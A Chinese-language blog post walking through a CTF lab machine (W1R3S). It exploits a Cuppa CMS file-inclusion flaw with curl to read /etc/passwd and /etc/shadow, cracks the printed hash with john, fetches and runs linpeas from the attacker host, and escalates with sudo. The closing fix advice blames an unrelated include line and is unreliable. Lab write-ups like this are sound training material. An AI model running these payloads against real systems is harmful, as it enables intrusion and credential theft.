freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

No.5-红队渗透项目:w1r3s-editable
2024-04-18 11:41:47

简介

作者:摇光

时间:2024-04-18

座右铭:路虽远,行则将至,事虽难,做则必成。

请注意:

对于所有这些计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为解决该CTF的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。

一、信息收集

在VM中获取攻击目标的ip地址,用nmap获取目标主机的ip地址

nmap -sP 192.168.111.0/24

1713407144_662084a83643984a94dea.png!small?1713407145129

目标主机的ip:192.168.111.137

扫描目标主机的全端口,及详细信息

nmap 192.168.111.137 -p- -sS -sV -A -T5

1713407268_66208524c72fa59f0c1d2.png!small?1713407269510

1713407299_6620854302493b6e88b8e.png!small?1713407299539

扫描发现存在21-ftp,22-ssh,80-http,3306-mysql 四个端口及开通的服务

FTP带有匿名登录名:Anonymous FTP login allowed

登录ftp,进行信息收集

ftp 192.168.111.137

用户名:Anonymous

密码:Anonymous

1713407600_66208670c0615945942ea.png!small?1713407601881

通过枚举发现content目录下存在有效信息

下载content目录下的txt文件

get 01.txt

get 02.txt

get 03.txt

1713407718_662086e6186c40ec9823b.png!small?1713407718628

本地查看下载txt文件内容

1713407899_6620879b43e46d7036e73.png!small?1713407899820

1713407927_662087b795a597bb176bb.png!small?1713407928086

02.txt 包含base64密文:SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==,burpsuit解密

1713407895_662087973af9a1a22a348.png!small?1713407899820

无有效信息

通过ftp无法获得关键信息,尝试使用http是否能发现web漏洞

二、web渗透

dir网站目录爆破

1713408273_6620891189440bd1b130b.png!small?1713408274557

通过枚举,浏览器进入http://192.168.111.137/administrator/installation/ ,发现Cuppa CMS,其是一个内容管理框架平台

1713408396_6620898c198f471249096.png!small?1713408397715

谷歌搜索该框架是否存在漏洞,及利用脚本

谷歌搜索:cuppa cms exp

https://www.exploit-db.com/exploits/25971

1713408523_66208a0b21ecaca30a3db.png!small?1713408523873

EXP说明:存在文件包含漏洞,通过访问该路径可以文件包含漏洞中的信息

http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

注意:target替换为目标主机的Ip地址

1713408583_66208a4775fa14ce2515a.png!small?1713408584068

浏览器访问:

http://192.168.111.137/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

1713408871_66208b674633890d5ccac.png!small?1713408871794

发现里面没有内容,因为url一般为get请求,此时需要用curl/burpsuit将其改为post请求,获得响应页面,这里使用curl进行post请求

curl进行post请求

先查询curl那些命令可以进行post请求

curl --help all

1713409095_66208c470e457d8770fbe.png!small?1713409096690

这里使用--data-urlencode

获得文件包含漏洞中的信息

curl --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.111.137/administrator/alerts/alertConfigField.php

1713409364_66208d54933ce0d3e6d75.png!small?1713409366333

1713409424_66208d90ba37252dcb00c.png!small?1713409427021

里面包含了账号和权限的一些信息,此时我们需要获取密码,就要读取shadow的信息

读取shadow的信息,获得密码

curl -s --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.168.111.137/administrator/alerts/alertConfigField.php

1713409590_66208e36d4284784349ea.png!small?1713409591489

1713409609_66208e49e80d239cc9781.png!small?1713409610595

这些信息都是权限的信息,但里面最长的部分包含密码,通过john 2.txt进行密码爆破

w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::

john 2.txt爆破

先将最长的信息写入2.txt,然后进行爆破密码

1713409797_66208f05015b22989ce4e.png!small?1713409800270

获得密码:computer         (w1r3s)

括号中的是账号

ssh进行登录

ssh w1r3s@192.168.111.137 

1713409876_66208f545cb81f9816d5e.png!small?1713409877175

此时需要通过工具(linpeas.sh)枚举来获得所有需要的信息

工具拷到当前文件夹,打开8081端口,准备上传sh文件

python -m SimpleHTTPServer 8081

1713410198_66209096bfe37498363d2.png!small?1713410199624

三、内核提权

上传sh文件并进行赋予权限,运行

上传文件:wget http://192.168.111.128:8081/linpeas.sh

赋予sh文件所能给的最高权限:chmod +x linpeas.sh

运行sh文件:./linpeas.sh

1713410352_6620913066f7a751cbaeb.png!small?1713410355059

1713410475_662091ab0f35c3b80a651.png!small?1713410475790

其中包含了很多信息,重点关注高亮信息

查看是否能利用sudo进行提权

sudo -l

1713410611_66209233dc787d319a143.png!small?1713410612475

User w1r3s may run the following commands on W1R3S:
(ALL : ALL) ALL

表明W1R3S目录下的权限是all,所有的命令都可以使用

进行sudo提权

提权到root:sudo su

查看当前权限:ls -la /etc/sudoers

切换到root目录:cd /root/

获取flag!

1713410781_662092ddca9e71ed756d6.png!small?1713410782452

获得flag                            完结撒花!!!

-----------------------------------------------------------------------------------------
____ ___  _   _  ____ ____      _  _____ _   _ _        _  _____ ___ ___  _   _ ____  
/ ___/ _ \| \ | |/ ___|  _ \    / \|_   _| | | | |      / \|_   _|_ _/ _ \| \ | / ___| 
| |  | | | |  \| | |  _| |_) |  / _ \ | | | | | | |     / _ \ | |  | | | | |  \| \___ \ 
| |__| |_| | |\  | |_| |  _ <  / ___ \| | | |_| | |___ / ___ \| |  | | |_| | |\  |___) |
\____\___/|_| \_|\____|_| \_\/_/   \_\_|  \___/|_____/_/   \_\_| |___\___/|_| \_|____/ 

-----------------------------------------------------------------------------------------

四、漏洞修复

查看文件包含漏洞文件:

1713411236_662094a41f1dfe738a8b1.png!small?1713411241751

include_once(realpath(__DIR__ . '/..')."/classes/Cuppa.php");

这是include_once()函数导致的文件包含漏洞,修复时可以改变其函数类型,也可以去掉. '/..'让其无法返回上级目录。

完结撒花!!!

如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。

# 渗透测试 # 网络安全 # web安全 # 内网渗透 # CTF
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录